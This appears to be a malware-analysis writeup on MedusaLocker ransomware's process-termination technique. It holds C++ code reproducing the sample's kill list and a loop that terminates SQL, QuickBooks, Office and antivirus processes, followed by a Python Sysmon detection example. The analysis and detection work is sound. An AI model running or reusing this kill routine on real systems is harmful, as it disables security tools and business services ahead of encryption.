This repository contains the analysis reports, technical details and any tools created to help with malware analysis. It also contains the TTPs extracted from the analysed samples, with code, along with the corresponding detection rules.
Ransomware often terminates certain running processes before encryption to ensure maximum impact. Stopping security software and system-monitoring tools reduces the chance of detection and of the encryption run being interrupted. Terminating resource-intensive applications such as databases and email servers also frees system resources for the encryption itself. In addition, many applications hold their files open (locked) while running, which prevents those files from being overwritten; stopping the application releases the lock so the ransomware can reach and encrypt the file. Together these steps maximise the chance of a successful encryption run and therefore the likelihood that the victim pays to regain access to their data.
MedusaLocker ransomware follows the same pattern: the sample carries a hard-coded list of process names that it looks for and kills before launching the encryption routine.
```cpp
#include <windows.h>
#include <tlhelp32.h>
#include <iostream>
#include <string>
#include <vector>

// Hard-coded kill list recovered from the MedusaLocker sample.
// Names are compared verbatim in the loop below; note that fdlauncher.exe is listed twice.
const std::vector<std::string> processNames = {
"wxServer.exe",
"wxServerView",
"sqlservr.exe",
"sqlmangr.exe",
"RAgui.exe",
"supervise.exe",
"Culture.exe",
"RTVscan.exe",
"Defwatch.exe",
"sqlbrowser.exe",
"WINWORD.EXE",
"QBW32.exe",
"QBDBMgr.exe",
"qbupdate.exe",
"QBCFMonitorService.exe",
"axlbridge.exe",
"QBIDPService.exe",
"httpd.exe",
"fdlauncher.exe",
"MsDtSrvr.exe",
"tomcat6.exe",
"java.exe",
"360se.exe",
"360doctor.exe",
"wdswfsafe.exe",
"fdlauncher.exe",
"fdhost.exe",
"GDscan.exe",
"ZhuDongFangYu.exe" };
```
Processes are enumerated with the well-known Tool Help APIs: CreateToolhelp32Snapshot, Process32First and Process32Next. First a snapshot of all running processes is taken with CreateToolhelp32Snapshot, then Process32First retrieves the first entry and Process32Next is called in a loop for the remaining ones.
```cpp
// Take a snapshot of every process on the system (TH32CS_SNAPPROCESS).
HANDLE hSnapshot = CreateToolhelp32Snapshot(TH32CS_SNAPPROCESS, 0);
if (hSnapshot == INVALID_HANDLE_VALUE)
{
    std::cerr << "Failed to create process snapshot\n";
    return -1;
}

// dwSize must be initialised before the first Process32First call, otherwise it fails.
PROCESSENTRY32 processEntry;
processEntry.dwSize = sizeof(processEntry);
if (!Process32First(hSnapshot, &processEntry))
{
    std::cerr << "Failed to retrieve first process\n";
    CloseHandle(hSnapshot);
    return -1;
}
```
In this section, we loop through every process recorded in the snapshot and compare its image name against the pre-defined list. If a match is found the process is terminated and the loop continues. Two details matter when reproducing or detecting this behaviour. First, the comparison is an exact, case-sensitive std::string match, so a process whose image name differs only in case (Windows itself treats image names case-insensitively) is silently skipped. Second, TerminateProcess only succeeds where OpenProcess could obtain PROCESS_TERMINATE on the target: the snippet shown does not enable SeDebugPrivilege, so processes owned by other users or by SYSTEM will typically fail to open or terminate, and protected (PPL) processes such as antimalware services cannot be terminated from user mode at all. That is why the code records failures instead of assuming every kill succeeded.
```cpp
// convertor(), processes and process_disruptor are defined in the complete source:
// convertor() turns the TCHAR szExeFile buffer into a std::string, processes collects
// the log lines shown in the report and process_disruptor counts successful kills.
do
{
    // Request only the rights needed: query for the name lookup, terminate for the kill.
    HANDLE hProcess = OpenProcess(PROCESS_QUERY_INFORMATION | PROCESS_TERMINATE, FALSE, processEntry.th32ProcessID);
    if (hProcess != NULL)
    {
        std::string processNameStr = convertor(processEntry.szExeFile);
        for (const auto& name : processNames)
        {
            // Exact, case-sensitive comparison against the kill list.
            if (processNameStr == name)
            {
                std::cout << "Terminating process " << processNameStr << " (PID: " << processEntry.th32ProcessID << ")...\n";
                if (TerminateProcess(hProcess, 0))
                {
                    processes.push_back("Process Terminated: " + processNameStr);
                    process_disruptor++;
                }
                else
                {
                    std::cerr << "Failed to terminate process " << processNameStr << "\n";
                    processes.push_back("Failed to terminate: " + processNameStr);
                }
            }
        }
        CloseHandle(hProcess);
    }
    // Processes that cannot be opened (insufficient rights, protected processes) are skipped silently.
} while (Process32Next(hSnapshot, &processEntry));

// Release the snapshot once enumeration is complete.
CloseHandle(hSnapshot);
```
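As an added example (not code from this repository or from the MedusaLocker sample), the detection side of this TTP can be expressed over Sysmon Event ID 10 (ProcessAccess), which records the SourceImage, TargetImage and GrantedAccess mask of each OpenProcess call Sysmon is configured to log. Because the sample requests PROCESS_QUERY_INFORMATION | PROCESS_TERMINATE (0x401), a single unknown binary opening several kill-list images with the PROCESS_TERMINATE bit set within a few seconds is a strong signal, and it fires whether or not the subsequent TerminateProcess succeeds. The event records, image paths, dropper name, time window and threshold below are constructed assumptions.

```python
"""Sysmon-based detection of the process-disruption step.

Added example, not code from the Shaddy43 repository or the MedusaLocker sample.
It replays constructed Sysmon Event ID 10 (ProcessAccess) records and flags any
source image that opens several kill-list processes with PROCESS_TERMINATE inside
a short window. The records, image paths and thresholds are assumptions.
"""
from collections import defaultdict
from datetime import datetime, timedelta
import ntpath

PROCESS_TERMINATE = 0x0001  # the access right the sample requests via OpenProcess

# Kill list from the sample, lowercased so matching is case-insensitive (the sample
# itself compares exact strings; the detection side should not inherit that gap).
KILL_LIST = {name.lower() for name in (
    "wxServer.exe", "wxServerView", "sqlservr.exe", "sqlmangr.exe", "RAgui.exe",
    "supervise.exe", "Culture.exe", "RTVscan.exe", "Defwatch.exe", "sqlbrowser.exe",
    "WINWORD.EXE", "QBW32.exe", "QBDBMgr.exe", "qbupdate.exe", "QBCFMonitorService.exe",
    "axlbridge.exe", "QBIDPService.exe", "httpd.exe", "fdlauncher.exe", "MsDtSrvr.exe",
    "tomcat6.exe", "java.exe", "360se.exe", "360doctor.exe", "wdswfsafe.exe",
    "fdhost.exe", "GDscan.exe", "ZhuDongFangYu.exe",
)}

# Constructed Sysmon Event ID 10 records (only the fields the rule needs).
RANSOMWARE = r"C:\Users\victim\AppData\Roaming\svhost.exe"  # hypothetical dropped binary
SAMPLE_EVENTS = [
    # The unknown binary opens four kill-list targets with 0x401 (QUERY_INFORMATION | TERMINATE).
    {"UtcTime": "2024-05-01 10:00:01.120", "SourceImage": RANSOMWARE,
     "TargetImage": r"C:\Program Files\Microsoft SQL Server\MSSQL\Binn\sqlservr.exe", "GrantedAccess": "0x401"},
    {"UtcTime": "2024-05-01 10:00:01.135", "SourceImage": RANSOMWARE,
     "TargetImage": r"C:\Program Files\Microsoft SQL Server\90\Shared\sqlbrowser.exe", "GrantedAccess": "0x401"},
    {"UtcTime": "2024-05-01 10:00:01.180", "SourceImage": RANSOMWARE,
     "TargetImage": r"C:\Program Files\Microsoft Office\root\Office16\WINWORD.EXE", "GrantedAccess": "0x401"},
    {"UtcTime": "2024-05-01 10:00:01.190", "SourceImage": RANSOMWARE,
     "TargetImage": r"C:\Windows\explorer.exe", "GrantedAccess": "0x401"},  # not on the list
    {"UtcTime": "2024-05-01 10:00:02.010", "SourceImage": RANSOMWARE,
     "TargetImage": r"C:\Program Files\Java\jre\bin\java.exe", "GrantedAccess": "0x401"},
    # Benign: Task Manager ends a single Word instance for a user.
    {"UtcTime": "2024-05-01 10:03:40.500", "SourceImage": r"C:\Windows\System32\Taskmgr.exe",
     "TargetImage": r"C:\Program Files\Microsoft Office\root\Office16\WINWORD.EXE", "GrantedAccess": "0x1"},
    # Benign: a monitoring tool queries SQL Server without terminate rights.
    {"UtcTime": "2024-05-01 10:03:41.000", "SourceImage": r"C:\Tools\procexp64.exe",
     "TargetImage": r"C:\Program Files\Microsoft SQL Server\MSSQL\Binn\sqlservr.exe", "GrantedAccess": "0x1000"},
]


def wants_terminate(granted_access: str) -> bool:
    """True if the Sysmon GrantedAccess hex mask includes PROCESS_TERMINATE."""
    return bool(int(granted_access, 16) & PROCESS_TERMINATE)


def kill_list_target(target_image: str):
    """Return the lowercased image name if it is on the kill list, else None."""
    name = ntpath.basename(target_image).lower()
    return name if name in KILL_LIST else None


def detect_process_disruption(events, window=timedelta(seconds=10), min_targets=3):
    """Group terminate-capable handle opens by SourceImage and alert on any source that
    touches at least `min_targets` distinct kill-list images within `window`.
    Returns a list of (source_image, sorted target names), one entry per offending source."""
    hits = defaultdict(list)
    for ev in events:
        target = kill_list_target(ev["TargetImage"])
        if target and wants_terminate(ev["GrantedAccess"]):
            ts = datetime.strptime(ev["UtcTime"], "%Y-%m-%d %H:%M:%S.%f")
            hits[ev["SourceImage"]].append((ts, target))

    alerts = []
    for source, opens in hits.items():
        opens.sort()
        # Slide the window start over each open; one alert per source is enough.
        for i, (start, _) in enumerate(opens):
            in_window = {name for ts, name in opens[i:] if ts - start <= window}
            if len(in_window) >= min_targets:
                alerts.append((source, sorted(in_window)))
                break
    return alerts


if __name__ == "__main__":
    for source, targets in detect_process_disruption(SAMPLE_EVENTS):
        print(f"ALERT process disruption: {source} opened {len(targets)} kill-list processes "
              f"with PROCESS_TERMINATE: {', '.join(targets)}")
```

Sysmon only emits Event ID 10 for targets that its configuration includes (most published configs restrict ProcessAccess logging to lsass.exe), so the kill-list images have to be added to the ProcessAccess include rules before this can fire. Task Manager ending one Word instance, or a tool opening SQL Server with query-only access, stays below the threshold; the rule keys on one source touching many of these images with terminate rights in a burst, which is what the enumeration loop above produces.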
Complete code: Shaddy43/MalwareAnalaysisSeries
Intended for educational purposes only!